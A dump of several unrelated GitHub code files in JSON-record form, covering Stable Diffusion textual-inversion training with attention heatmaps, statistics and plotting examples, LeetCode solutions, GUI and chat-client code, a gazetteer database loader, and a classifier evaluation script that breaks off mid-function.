tokenizer,\n learnable_property=\"object\", # [object, style]\n size=512,\n repeats=100,\n interpolation=\"bicubic\",\n flip_p=0.5,\n set=\"train\",\n placeholder_token=\"*\",\n center_crop=False,\n ):\n\n self.data_root = data_root\n self.tokenizer = tokenizer\n self.learnable_property = learnable_property\n self.size = size\n self.placeholder_token = placeholder_token\n self.center_crop = center_crop\n self.flip_p = flip_p\n\n self.image_paths = [os.path.join(self.data_root, file_path) for file_path in os.listdir(self.data_root)]\n\n self.num_images = len(self.image_paths)\n self._length = self.num_images\n\n if set == \"train\":\n self._length = self.num_images * repeats\n\n self.interpolation = {\n \"linear\": PIL.Image.LINEAR,\n \"bilinear\": PIL.Image.BILINEAR,\n \"bicubic\": PIL.Image.BICUBIC,\n \"lanczos\": PIL.Image.LANCZOS,\n }[interpolation]\n\n self.templates = imagenet_style_templates_small if learnable_property == \"style\" else imagenet_templates_small\n self.flip_transform = transforms.RandomHorizontalFlip(p=self.flip_p)\n\n def __len__(self):\n return self._length\n\n def __getitem__(self, i):\n example = {}\n image = Image.open(self.image_paths[i % self.num_images])\n\n if not image.mode == \"RGB\":\n image = image.convert(\"RGB\")\n\n placeholder_string = self.placeholder_token\n text = random.choice(self.templates).format(placeholder_string)\n\n example[\"input_ids\"] = self.tokenizer(\n text,\n padding=\"max_length\",\n truncation=True,\n max_length=self.tokenizer.model_max_length,\n return_tensors=\"pt\",\n ).input_ids[0]\n\n # default to score-sde preprocessing\n img = np.array(image).astype(np.uint8)\n\n if self.center_crop:\n crop = min(img.shape[0], img.shape[1])\n h, w, = (\n img.shape[0],\n img.shape[1],\n )\n img = img[(h - crop) // 2: (h + crop) // 2, (w - crop) // 2: (w + crop) // 2]\n\n image = Image.fromarray(img)\n image = image.resize((self.size, self.size), resample=self.interpolation)\n\n image = self.flip_transform(image)\n image = np.array(image).astype(np.uint8)\n image = (image / 127.5 - 1.0).astype(np.float32)\n\n example[\"pixel_values\"] = torch.from_numpy(image).permute(2, 0, 1)\n return example\n\n\n# Setup the model\n\n# Load the tokenizer and add the placeholder token as a additional special token.\ntokenizer = CLIPTokenizer.from_pretrained(\n pretrained_model_name_or_path,\n subfolder=\"tokenizer\",\n)\n\n# Add the placeholder token in tokenizer\nnum_added_tokens = tokenizer.add_tokens(placeholder_token)\nif num_added_tokens == 0:\n raise ValueError(\n f\"The tokenizer already contains the token {placeholder_token}. Please pass a different\"\n \" `placeholder_token` that is not already in the tokenizer.\"\n )\n\n# Get token ids for our placeholder and initializer token\n# Convert the initializer_token, placeholder_token to ids\ntoken_ids = tokenizer.encode(initializer_token, add_special_tokens=False)\n# Check if initializer_token is a single token or a sequence of tokens\nif len(token_ids) > 1:\n raise ValueError(\"The initializer token must be a single token.\")\n\ninitializer_token_id = token_ids[0]\nplaceholder_token_id = tokenizer.convert_tokens_to_ids(placeholder_token)\n\n# Load the Stable Diffusion model, here we obtain the main pre-trained components of the diffusion model\ntext_encoder = CLIPTextModel.from_pretrained(\n pretrained_model_name_or_path, subfolder=\"text_encoder\"\n)\nvae = AutoencoderKL.from_pretrained(\n pretrained_model_name_or_path, subfolder=\"vae\"\n)\nunet = UNet2DConditionModel.from_pretrained(\n pretrained_model_name_or_path, subfolder=\"unet\"\n)\n\n# We have added the placeholder_token in the tokenizer so we resize the \n# token embeddings here this will a new embedding vector in the token embeddings\n# for our placeholder_token\ntext_encoder.resize_token_embeddings(len(tokenizer))\n\n\n# Initialize the newly added placeholder token with the embeddings of the initializer token\ntoken_embeds = text_encoder.get_input_embeddings().weight.data\ntoken_embeds[placeholder_token_id] = token_embeds[initializer_token_id]\n\n# Freeze rest of the model parameters here since we are only training the text\n# encoder\ndef freeze_params(params):\n \"\"\"\n Freezes the parameters in the models so the weights are not changed while\n training\n \"\"\"\n for param in params:\n param.requires_grad = False\n\n\n# Freeze vae and unet and encoder parameters\nfreeze_params(vae.parameters())\nfreeze_params(unet.parameters())\nparams_to_freeze = itertools.chain(\n text_encoder.text_model.encoder.parameters(),\n text_encoder.text_model.final_layer_norm.parameters(),\n text_encoder.text_model.embeddings.position_embedding.parameters(),\n)\nfreeze_params(params_to_freeze)\n\n# Create our training data\ntrain_dataset = TextualInversionDataset(\n data_root=save_path,\n tokenizer=tokenizer,\n size=vae.sample_size,\n placeholder_token=placeholder_token,\n repeats=100,\n learnable_property=what_to_teach,\n center_crop=False,\n set=\"train\",\n)\n\n\ndef create_dataloader(train_batch_size=1):\n return torch.utils.data.DataLoader(train_dataset, batch_size=train_batch_size, shuffle=True)\n\n\n# Create noise_scheduler for training\nnoise_scheduler = DDPMScheduler.from_config(pretrained_model_name_or_path, subfolder=\"scheduler\")\n\n# Training\n# Define hyperparameters for our training\n# Setting up all training args\nhyperparameters = {\n \"learning_rate\": 1e-06,\n \"scale_lr\": True,\n \"max_train_steps\": 1200,\n \"save_steps\": 250,\n \"train_batch_size\": 2,\n \"gradient_accumulation_steps\": 1,\n \"gradient_checkpointing\": True,\n \"mixed_precision\": \"fp16\",\n \"seed\": 42,\n \"output_dir\": \"new-concept\"\n}\n\n# Training function\nlogger = get_logger(__name__)\n\n\ndef save_progress(text_encoder, placeholder_token_id, accelerator, save_path):\n \"\"\"\n Shows the progress and what step in training the model is in.\n \"\"\"\n logger.info(\"Saving embeddings\")\n learned_embeds = accelerator.unwrap_model(text_encoder).get_input_embeddings().weight[placeholder_token_id]\n learned_embeds_dict = {placeholder_token: learned_embeds.detach().cpu()}\n torch.save(learned_embeds_dict, save_path)\n\n\ndef training_function(text_encoder, vae, unet):\n \"\"\"\n Runs training on the diffusion model. The text encoder is the main component\n being trained here. We go through multiple iterations while using prompts\n that encode the new concept being learned to guide the model to associate\n the visual markers in the training images to the text in the prompt.\n \"\"\"\n train_batch_size = hyperparameters[\"train_batch_size\"]\n gradient_accumulation_steps = hyperparameters[\"gradient_accumulation_steps\"]\n learning_rate = hyperparameters[\"learning_rate\"]\n max_train_steps = hyperparameters[\"max_train_steps\"]\n output_dir = hyperparameters[\"output_dir\"]\n gradient_checkpointing = hyperparameters[\"gradient_checkpointing\"]\n\n accelerator = Accelerator(\n gradient_accumulation_steps=gradient_accumulation_steps,\n mixed_precision=hyperparameters[\"mixed_precision\"],\n )\n\n if gradient_checkpointing:\n text_encoder.gradient_checkpointing_enable()\n unet.enable_gradient_checkpointing()\n\n train_dataloader = create_dataloader(train_batch_size)\n\n if hyperparameters[\"scale_lr\"]:\n learning_rate = (\n learning_rate * gradient_accumulation_steps * train_batch_size * accelerator.num_processes\n )\n\n # Initialize the optimizer\n optimizer = torch.optim.AdamW(\n text_encoder.get_input_embeddings().parameters(), # only optimize the embeddings\n lr=learning_rate,\n )\n\n text_encoder, optimizer, train_dataloader = accelerator.prepare(\n text_encoder, optimizer, train_dataloader\n )\n\n # weight_dtype = torch.float32\n # if accelerator.mixed_precision == \"fp16\":\n # weight_dtype = torch.float16\n # elif accelerator.mixed_precision == \"bf16\":\n # weight_dtype = torch.bfloat16\n\n # Move vae and unet to device\n # vae.to(accelerator.device, dtype=weight_dtype)\n # unet.to(accelerator.device, dtype=weight_dtype)\n vae.to(accelerator.device)\n unet.to(accelerator.device)\n\n # Keep vae in eval mode\n vae.eval()\n # Keep unet in train mode to enable gradient checkpointing\n unet.train()\n\n # We need to recalculate our total training steps as the size of the training dataloader may have changed.\n num_update_steps_per_epoch = math.ceil(len(train_dataloader) / gradient_accumulation_steps)\n num_train_epochs = math.ceil(max_train_steps / num_update_steps_per_epoch)\n\n total_batch_size = train_batch_size * accelerator.num_processes * gradient_accumulation_steps\n\n logger.info(\"***** Running training *****\")\n logger.info(f\" Num examples = {len(train_dataset)}\")\n logger.info(f\" Instantaneous batch size per device = {train_batch_size}\")\n logger.info(f\" Total train batch size (w. parallel, distributed & accumulation) = {total_batch_size}\")\n logger.info(f\" Gradient Accumulation steps = {gradient_accumulation_steps}\")\n logger.info(f\" Total optimization steps = {max_train_steps}\")\n # Only show the progress bar once on each machine.\n progress_bar = tqdm(range(max_train_steps), disable=not accelerator.is_local_main_process)\n progress_bar.set_description(\"Steps\")\n global_step = 0\n\n # Set seeding for the training and daam generation\n set_seed(0)\n torch.manual_seed(0)\n gen = daam.set_seed(0)\n\n for epoch in range(num_train_epochs):\n text_encoder.train()\n for step, batch in enumerate(train_dataloader):\n with accelerator.accumulate(text_encoder):\n # Convert images to latent space\n # latents = vae.encode(batch[\"pixel_values\"].to(dtype=weight_dtype)).latent_dist.sample().detach()\n latents = vae.encode(batch[\"pixel_values\"]).latent_dist.sample().detach()\n latents = latents * 0.18215\n\n # Sample noise that we'll add to the latents\n noise = torch.randn_like(latents)\n bsz = latents.shape[0]\n # Sample a random timestep for each image\n timesteps = torch.randint(0, noise_scheduler.num_train_timesteps, (bsz,), device=latents.device).long()\n\n # Add noise to the latents according to the noise magnitude at each timestep\n # (this is the forward diffusion process)\n noisy_latents = noise_scheduler.add_noise(latents, noise, timesteps)\n\n # Get the text embedding for conditioning\n encoder_hidden_states = text_encoder(batch[\"input_ids\"])[0]\n\n # Predict the noise residual\n # noise_pred = unet(noisy_latents, timesteps, encoder_hidden_states.to(weight_dtype)).sample\n noise_pred = unet(noisy_latents, timesteps, encoder_hidden_states).sample\n\n loss = F.mse_loss(noise_pred, noise, reduction=\"none\").mean([1, 2, 3]).mean()\n accelerator.backward(loss)\n\n # Zero out the gradients for all token embeddings except the newly added\n # embeddings for the concept, as we only want to optimize the concept embeddings\n if accelerator.num_processes > 1:\n grads = text_encoder.module.get_input_embeddings().weight.grad\n else:\n grads = text_encoder.get_input_embeddings().weight.grad\n # Get the index for tokens that we want to zero the grads for\n index_grads_to_zero = torch.arange(len(tokenizer)) != placeholder_token_id\n grads.data[index_grads_to_zero, :] = grads.data[index_grads_to_zero, :].fill_(0)\n\n optimizer.step()\n optimizer.zero_grad()\n\n # Checks if the accelerator has performed an optimization step behind the scenes\n if accelerator.sync_gradients:\n progress_bar.update(1)\n global_step += 1\n if global_step % hyperparameters[\"save_steps\"] == 0:\n save_path = os.path.join(output_dir, f\"learned_embeds-step-{global_step}.bin\")\n save_progress(text_encoder, placeholder_token_id, accelerator, save_path)\n\n logs = {\"loss\": loss.detach().item()}\n progress_bar.set_postfix(**logs)\n\n # Every 10 global iterations we observe the attribution map for the new object being trained\n if global_step % 50 == 0 or global_step <= 5:\n # Set up pipeline for text to image inference\n pipe = StableDiffusionPipeline.from_pretrained(\n pretrained_model_name_or_path,\n text_encoder=accelerator.unwrap_model(text_encoder),\n tokenizer=tokenizer,\n vae=vae,\n unet=unet,\n )\n pipe.save_pretrained(output_dir)\n # Also save the newly trained embeddings\n save_path = os.path.join(output_dir, f\"learned_embeds.bin\")\n save_progress(text_encoder, placeholder_token_id, accelerator, save_path)\n\n # Display and save DAAM\n pipe.to(\"cuda\")\n file_name = \"images/\" + initializer_token + str(global_step) + \".png\"\n prompt = \"\"\n with torch.cuda.amp.autocast(dtype=torch.float16), torch.no_grad():\n with trace(pipe) as tc:\n out = pipe(prompt, num_inference_steps=30, generator=gen)\n heat_map = tc.compute_global_heat_map(prompt)\n heat_map = heat_map.compute_word_heat_map(\"\")\n heat_map.plot_overlay(out.images[0])\n # Show image\n plt.title(placeholder_token)\n plt.savefig(file_name)\n plt.show()\n del pipe\n\n if global_step >= max_train_steps:\n break\n\n accelerator.wait_for_everyone()\n\n # Create the pipeline and save the model\n if accelerator.is_main_process:\n pipe = StableDiffusionPipeline.from_pretrained(\n pretrained_model_name_or_path,\n text_encoder=accelerator.unwrap_model(text_encoder),\n tokenizer=tokenizer,\n vae=vae,\n unet=unet,\n )\n pipe.save_pretrained(output_dir)\n # Also save the newly trained embeddings\n save_path = os.path.join(output_dir, f\"learned_embeds.bin\")\n save_progress(text_encoder, placeholder_token_id, accelerator, save_path)\n\n\nimport accelerate\n\naccelerate.notebook_launcher(training_function, args=(text_encoder, vae, unet))\n\nfor param in itertools.chain(unet.parameters(), text_encoder.parameters()):\n if param.grad is not None:\n del param.grad # free some memory\n torch.cuda.empty_cache()\n\n# Testing the Trained Model with the New Style\n\n# Set up the model pipeline so we can input prompts for image generation\npipe = StableDiffusionPipeline.from_pretrained(\n hyperparameters[\"output_dir\"],\n # \"downloaded_embedding\",\n torch_dtype=torch.float16,\n force_download=True,\n).to(\"cuda\")\n\n# Run the Stable Diffusion pipeline\nprompt = \"Tree in the style of \" # @param {type:\"string\"}\nnum_samples = 2\nnum_rows = 1\n\nall_images = []\nfor _ in range(num_rows):\n images = pipe([prompt] * num_samples, num_inference_steps=50, guidance_scale=7.5).images\n all_images.extend(images)\n\ngrid = image_grid(all_images, num_rows, num_samples)\n\n# Display Generated Image with the Heatmap for Style Association\nprompt = \"tree in the style of \"\ngen = daam.set_seed(0)\nwith torch.cuda.amp.autocast(dtype=torch.float16), torch.no_grad():\n with trace(pipe) as tc:\n out = pipe(prompt, num_inference_steps=30, generator=gen)\n heat_map = tc.compute_global_heat_map(prompt)\n heat_map = heat_map.compute_word_heat_map(\"\")\n heat_map.plot_overlay(out.images[0])\n # Show image\n plt.title(placeholder_token)\n plt.show()\n","repo_name":"VikramBharadwaj1995/analysis-diffusion","sub_path":"new_style_daam.py","file_name":"new_style_daam.py","file_ext":"py","file_size_in_byte":21446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35194976108","text":"# http://www.scipy.org/Cookbook/Matplotlib/Maps\n\nfrom mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\nimport numpy as np\n# set up orthographic map projection with\n# perspective of satellite looking down at 50N, 100W.\n# use low resolution coastlines.\n# don't plot features that are smaller than 1000 square km.\nmap = Basemap(projection='ortho',lat_0=50,lon_0=-100,\n resolution='l',area_thresh=1000.)\n# draw coastlines, country boundaries, fill continents.\nmap.drawcoastlines()\nmap.drawcountries()\nmap.fillcontinents(color='coral')\n# draw the edge of the map projection region (the projection limb)\nmap.drawmapboundary()\n# draw lat/lon grid lines every 30 degrees.\nmap.drawmeridians(np.arange(0,360,30))\nmap.drawparallels(np.arange(-90,90,30))\nplt.show()\n","repo_name":"ContinuumIO/anaconda-recipes","sub_path":"basemap/cookbook.py","file_name":"cookbook.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"3"} +{"seq_id":"7786248614","text":"\"\"\" Conversion for Cochran-Test \"\"\"\n\n# author:\tThomas Haslwanter\n# date:\t\tJune-2022\n\n# Import the standard packages\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom scipy import stats\nimport pingouin as pg\nfrom statsmodels.stats.contingency_tables import cochrans_q\n\n\ndef cochran_matrix_2_events(in_mat: np.ndarray) -> pd.DataFrame:\n \"\"\"Convert a 0/1-matrix to corresponding events\n\n Parameters\n ----------\n in_mat : matrix, with the events for each category in row-form\n\n Returns\n -------\n df : DataFrame, with columns ['subject', 'category', 'value']\n\n \"\"\"\n\n out = np.nan * np.ones((1, 3)) # Dummy-value for initiation output-matrix\n\n subjects = np.arange(in_mat.shape[1])\n categories = np.arange(in_mat.shape[0])\n\n for ii in categories:\n new = np.column_stack( (subjects, ii*np.ones(len(subjects)),\n in_mat[ii,:]) )\n out = np.vstack( (out, new) )\n\n out = out[1:,:] # Eliminate the dummy init-row\n\n df = pd.DataFrame(out, columns=['subject', 'category', 'value'])\n return df\n\n\nif __name__ == '__main__':\n\n # Dummy data\n tasks = np.array([[0,1,1,0,1,0,0,1,0,0,0,0],\n [1,1,1,0,0,1,0,1,1,1,1,1],\n [0,0,1,0,0,1,0,0,0,0,0,0]])\n\n\n # Calculate with statsmodels\n df = pd.DataFrame(tasks.T, columns = ['Task1', 'Task2', 'Task3'])\n sm_results = cochrans_q(df)\n\n print('\\nStatsmodels: --------------------------')\n print(dir(sm_results))\n print(sm_results.Q)\n\n # Calculate with pingouin\n df_pg = cochran_matrix_2_events(tasks)\n pg_out = pg.cochran(df_pg, dv='value', within='category', subject='subject')\n\n print('\\nPingouin: --------------------------')\n print(pg_out)\n","repo_name":"thomas-haslwanter/statsintro-python-2e","sub_path":"src/code_quantlets/09_TestsCategoricalData/compGroups/cochran.py","file_name":"cochran.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"} +{"seq_id":"74674717842","text":"class Solution:\n def pushDominoes(self, dominoes: str) -> str:\n state = [ d for d in dominoes ]\n left = set([ i for i, d in enumerate(dominoes) if d == \"L\" ])\n right = set([ i for i, d in enumerate(dominoes) if d == \"R\" ])\n\n while right or left:\n nextright = set()\n for r in right:\n if r + 1 in left:\n left.discard(r + 1)\n continue\n if r + 2 in left:\n left.discard(r + 2)\n continue\n if r + 1 not in right and r + 1 < len(state) and state[r + 1] == \".\":\n nextright.add(r + 1)\n state[r + 1] = \"R\"\n\n nextleft = set()\n for l in left:\n if l - 1 not in left and l > 0 and state[l - 1] == \".\":\n nextleft.add(l - 1)\n state[l - 1] = \"L\"\n\n left = nextleft\n right = nextright\n\n return \"\".join(state)\n","repo_name":"stbrumme/leetcode","sub_path":"0838.py","file_name":"0838.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"42813284839","text":"from typing import List\n\n\nclass Solution:\n def numSquares(self, n: int) -> int:\n dp = [float('inf')] * (n+1)\n dp[0] = 0\n for i in range(n+1):\n j = 1\n while i + j * j <= n:\n dp[i + j * j] = min(dp[i + j * j], dp[i] + 1)\n j += 1\n return dp[-1]\n\n\nif __name__ == \"__main__\":\n s = Solution()\n result = s.numSquares(12)\n print(result)\n","repo_name":"kenwoov/PlayLeetCode","sub_path":"Algorithms/Medium/279. Perfect Squares/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30981820098","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nfrom PySide.QtGui import *\nfrom PySide.QtCore import *\n\n# 画面上部のDescription\nclass TopDescriptionWidget(QWidget):\n # def __init__(self, parent=None, text):\n def __init__(self, parent=None):\n super(TopDescriptionWidget, self).__init__(parent)\n self.text = \"test\"\n\n self.title_label = QLabel(\"

Description

\")\n self.details_label = QLabel(self.text)\n\n layout = QVBoxLayout()\n layout.addWidget(self.title_label)\n layout.addWidget(self.details_label) \n self.setLayout(layout)\n\n def setDetails(self, text):\n self.details_label.setText(text) \n\n# Pause / CF 分岐ボタンwidget\nclass BranchButtonBoxWidget(QWidget):\n def __init__(self, parent=None):\n super(BranchButtonBoxWidget, self).__init__(parent)\n\n self.pause_analyzer_button = QPushButton(\"Pause Analyzer\", parent=self)\n self.cf_analyzer_button = QPushButton(\"CF Analyzer\", parent=self)\n\n layout = QHBoxLayout()\n layout.addWidget(self.pause_analyzer_button)\n layout.addWidget(self.cf_analyzer_button) \n self.setLayout(layout)\n\n# TOP 画面Widget\nclass TopWindowWidget(QWidget):\n def __init__(self, parent=None):\n super(TopWindowWidget, self).__init__(parent)\n\n self.layout = QVBoxLayout() \n self.branch_button_widget = BranchButtonBoxWidget()\n\n # test\n self.test_text = \"\"\n for i in range(5):\n self.test_text += \"ヾ(⌒(ノシ >ω<)ノシ ヾ(:3ノシヾ)ノシ ヾ(°ω。ヽ=ノ°ω。)ノ ヾ(⌒(ノシ >ω<)ノシ ジタバタ ヾ(:3ノシヾ)ノシ三ヾ(ノシヾε:)ノ (ノシ>△<)ノシ _(⌒ノシ 'ω')ノシ ヾ(⌒(ノ'ω')ノ \\n\" \n #test\n\n self.description_widget = TopDescriptionWidget()\n self.description_widget.setDetails(self.test_text)\n\n self.layout.addWidget(self.description_widget)\n self.layout.addWidget(self.branch_button_widget)\n\n self.setLayout(self.layout) \n\n# def clearAllWidgets():\n# for i in reversed(range(layout.count())):\n# layout.itemAt(i).widget().setParent(None)\n\nclass MainWindow(QMainWindow):\n def __init__(self, parent=None):\n super(MainWindow, self).__init__(parent)\n self.setWindowTitle(\"Main Window\")\n # self.setFixedSize(800, 250)\n # self.status_bar.showMessage(\"Main Window\")\n\n # top window\n self.top_window_widget = TopWindowWidget()\n self.setCentralWidget(self.top_window_widget)\n\n def changeWindwoWidget(self, window_widget):\n self.setCentralWidget(window_widget)\n\ndef main(): \n app = QApplication(sys.argv)\n \n # 日本語設定.\n QTextCodec.setCodecForCStrings(QTextCodec.codecForLocale()) \n\n main_window = MainWindow()\n main_window.show()\n\n sys.exit(app.exec_()) \n\nif __name__ == '__main__': \n main() \n \n","repo_name":"mimaun/CF-Analyzer","sub_path":"codes/top_widget.py","file_name":"top_widget.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23819124906","text":"'''\nProblem statement-\nGiven a chain of matrices A1, A2, A3,.....An, we have to figure out the most efficient way to multiply these matrices. In other words, determine where to place parentheses to minimize the number of multiplications.\n\nYou will be given an array p[] of size n + 1. Dimension of matrix Ai is p[i - 1]*p[i]. You will have to find the minimum number of multiplications needed to multiply the chain.\n\nLogical Intuition-\nWe place out paranthesis in all possible positions and calculate the cost to multiply the matrices. We will store them in the array 'dp'.\nThen we will choose the minimum cost required to multiply the matrices.\n'''\n\n\nimport sys\n\n\ndef mcm(arr, i, j, dp):\n '''\n Summary line:\n This function helps us to find the minimum cost\n required to multiply matrices.\n\n Args:\n arr: array of dimensions of matrices\n i: starting index of arr\n j: length of arr\n dp: python list used for memoization\n\n Returns:\n Minimum cost to multiply.\n\n '''\n if i >= j: #base case\n return 0\n ans = sys.maxsize\n for k in range(i, j):\n if dp[i][k] != -1:\n ans1 = dp[i][k]\n else:\n ans1 = mcm(arr, i, k, dp)\n dp[i][k] = ans1\n if dp[k+1][j] != -1:\n ans2 = dp[k+1][j]\n else:\n ans2 = mcm(arr, k+1, j, dp)\n dp[k+1][j] = ans2\n ans3 = arr[i-1]*arr[k]*arr[j] #calculating the cost\n cost = ans1+ans2+ans3 #taking sum of cost calculated for a particular position of paranthesis\n ans = min(ans, cost) # returning the min cost\n return ans\n\nif __name__ == \"__main__\":\n n = int(input())\n arr = [int(i) for i in input().split()]\n dp = [[-1 for j in range(n+1)]for i in range(n+1)] #initalizing dp array of size nXn with -1\n print(mcm(arr, 1, n, dp))\n\n\n'''\nSample input-\n3\n10 15 20 25\n\nSample output-\n8000\n'''\n","repo_name":"HarshCasper/NeoAlgo","sub_path":"Python/dp/Matrix-Chain-Multiplication.py","file_name":"Matrix-Chain-Multiplication.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":873,"dataset":"github-code","pt":"3"} +{"seq_id":"41882326865","text":"\"\"\"\nMenu Bar\nWritten by Joshua Kitchen - 2023\n\"\"\"\n\nimport tkinter as tk\nfrom tkinter import filedialog, colorchooser\nfrom pathlib import Path\n\nfrom gui.connect_dialog import ConnectDialog\n\n\nclass MenuBar(tk.Menu):\n def __init__(self, parent, parent_font, notification_sound):\n tk.Menu.__init__(self)\n self.parent = parent\n self.file_menu = tk.Menu(self.parent, tearoff=0)\n self.edit_menu = tk.Menu(self.parent, tearoff=0)\n self.connect_menu = tk.Menu(self.parent, tearoff=0)\n self.options_menu = tk.Menu(self.parent, tearoff=0)\n self.font_menu = tk.Menu(self.parent, tearoff=0)\n self.sound_menu = tk.Menu(self.parent, tearoff=0)\n\n self.file_menu.add_command(label=\"Clear chat\", command=self.parent._clear_chat_box, accelerator=\"Ctrl+Del\")\n self.file_menu.add_command(label=\"Archive chat\", command=self.archive_chat, accelerator=\"Ctrl+S\")\n self.edit_menu.add_command(label=\"Copy\", command=self.copy, accelerator=\"Ctrl+C\")\n self.edit_menu.add_command(label=\"Cut\", command=lambda: self.parent.user_input.event_generate('<>'),\n accelerator=\"Ctrl+X\")\n self.edit_menu.add_command(label=\"Paste\", command=lambda: self.parent.user_input.event_generate('<>'),\n accelerator=\"Ctrl+V\")\n self.connect_menu.add_command(label=\"Connect to new chatroom\", command=self.connect_to_room,\n accelerator=\"Ctrl+N\")\n self.connect_menu.add_command(label=\"Disconnect from chatroom\", command=self.disconnect_from_room,\n accelerator=\"Ctrl+End\")\n self.options_menu.add_command(label=\"Increase font size\", command=self.parent.increase_font_size,\n accelerator=\"Ctrl+Up Arrow\")\n self.options_menu.add_command(label=\"Decrease font size\", command=self.parent.decrease_font_size,\n accelerator=\"Ctrl+Down Arrow\")\n self.options_menu.add_cascade(label=\"Change font\", menu=self.font_menu)\n self.options_menu.add_cascade(label=\"Change Notification Sound\", menu=self.sound_menu)\n self.options_menu.add_command(label=\"Change background color\", command=self.change_bg)\n\n self.font_radio_var = tk.IntVar()\n self.notification_radio_var = tk.IntVar()\n\n for i, font in enumerate(self.parent.fonts):\n self.font_menu.add_radiobutton(label=font, var=self.font_radio_var, value=i,\n command=lambda f=font: self.parent.change_font(f))\n if font == parent_font:\n self.font_radio_var.set(i)\n\n for i, sound in enumerate(self.parent.notification_sounds):\n self.sound_menu.add_radiobutton(label=sound[1], var=self.notification_radio_var, value=i,\n command=lambda f=sound[0]: self.parent.set_notification_sound(f))\n if sound[0] == notification_sound:\n self.notification_radio_var.set(i)\n\n self.add_cascade(menu=self.file_menu, label=\"File\")\n self.add_cascade(menu=self.edit_menu, label=\"Edit\")\n self.add_cascade(menu=self.options_menu, label=\"Options\")\n self.add_cascade(menu=self.connect_menu, label=\"Connect\")\n\n def archive_chat(self, *args):\n chat_text = self.parent.chat_box.get(0.0, tk.END)\n chosen_filepath = filedialog.asksaveasfilename(filetypes=[('All', '*'), ('.txt', '*.txt')],\n initialdir=Path.home())\n if chosen_filepath == () or chosen_filepath == '':\n return\n with open(chosen_filepath, 'a+') as file:\n file.write(chat_text)\n\n def copy(self, *args):\n widget = self.parent.focus_get()\n if widget is self.parent.chat_box or widget is self.parent.user_input:\n widget.event_generate('<>')\n\n def change_bg(self):\n color = colorchooser.askcolor()\n if color is None:\n return\n self.parent.app_bg = color[1]\n self.parent.chat_area_frame.configure(background=self.parent.app_bg)\n self.parent.input_frame.configure(background=self.parent.app_bg)\n\n def connect_to_room(self, *args):\n self.parent.disconnect()\n window = tk.Toplevel()\n ConnectDialog(window, self.parent)\n\n def disconnect_from_room(self, *args):\n self.parent.disconnect()\n","repo_name":"kitchej/pychat","sub_path":"client/gui/menu_bar.py","file_name":"menu_bar.py","file_ext":"py","file_size_in_byte":4487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41908064706","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# the points for generating the velocity field\ny,x = np.mgrid[-3:3:100j,-3:3:100j]\n\n# the initial conditions for generating stream lines\n# provided as an array of points in the plane\nxcoords = np.linspace(-3,3,22,endpoint=True)\nycoords = np.zeros_like(xcoords)\nstrmpts = np.array(zip(xcoords, ycoords))\n\nu = 0.5*y\nv = -8*x\n\nplt.streamplot(x, y, u, v, start_points=strmpts, density=35)\nplt.show()\n","repo_name":"jme2103/visualization-tools","sub_path":"stream-plots.py","file_name":"stream-plots.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30713578762","text":"import sys\nimport psycopg2\nimport re\n\nconn = psycopg2.connect(\"dbname=gazetteers\")\ncursor = conn.cursor()\nwith open(\"gov-data_PL.txt\") as f:\n for line in f:\n attrs = re.split(r'\\t', line)\n try: float(attrs[11])\n except ValueError: attrs[11] = 0.0\n try: float(attrs[12])\n except ValueError: attrs[12] = 0.0\n query = \"INSERT INTO gov (govid, type, typeid, curname, lastgername, state, adm1, adm2, adm3, adm4, postalcode, lat, lon) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\n cursor.execute(query, attrs)\nconn.commit()\ncursor.close()\nconn.close()\n","repo_name":"heinmade/gazetteers.net-server","sub_path":"db/data/gov_to_db.py","file_name":"gov_to_db.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12910470037","text":"from training_tuning import *\n\ndef predict_tree(X_train, Y_train, X_test, Y_test, depth):\n \"\"\" This function fit the DT model with all training data for test set (first\n 10 data points) output the final prediction.\n\n Report the final prediction in order.\n Report the actual results\n \"\"\"\n # Choose max_depth=13, build appropriate classifier\n dtree = tree.DecisionTreeClassifier(max_depth=depth)\n\n # fit the model\n dtree.fit(X_train, Y_train)\n print(\"\\nCreated and trained a DT classifier\") #, knn\n\n pred = dtree.predict(X_test)\n\n # Report the features importances\n print(\"\\nFeature Importance of DT:\")\n print(dtree.feature_importances_)\n\n count = 0\n total_error = 0\n for i in range(len(pred)):\n guess = pred[i]\n true = Y_test[i]\n if guess == true:\n count += 1\n\n error_sq = (guess-true)**2\n total_error += error_sq\n\n MSE = float(total_error / len(Y_test))\n\n print(\"\\nThe total number of review we are testing is:\", len(Y_test))\n print(\"The total number of correct predict using current DT classifier is:\", count)\n print(\"The mean square error is:\", MSE)\n\n return dtree\n\n\ndef predict_knn(X_train, Y_train, X_test, Y_test, neighbors):\n \"\"\" This function fit the DT model with all training data for test set (first\n 10 data points) output the final prediction.\n\n Report the final prediction in order.\n Report the actual results\n \"\"\"\n # Choose max_depth=13, build appropriate classifier\n knn = KNeighborsClassifier(n_neighbors=neighbors)\n\n # fit the model\n knn.fit(X_train, Y_train)\n print(\"\\nCreated and trained a KNN classifier\") #, knn\n\n pred = knn.predict(X_test)\n\n count = 0\n total_error = 0\n for i in range(len(pred)):\n guess = 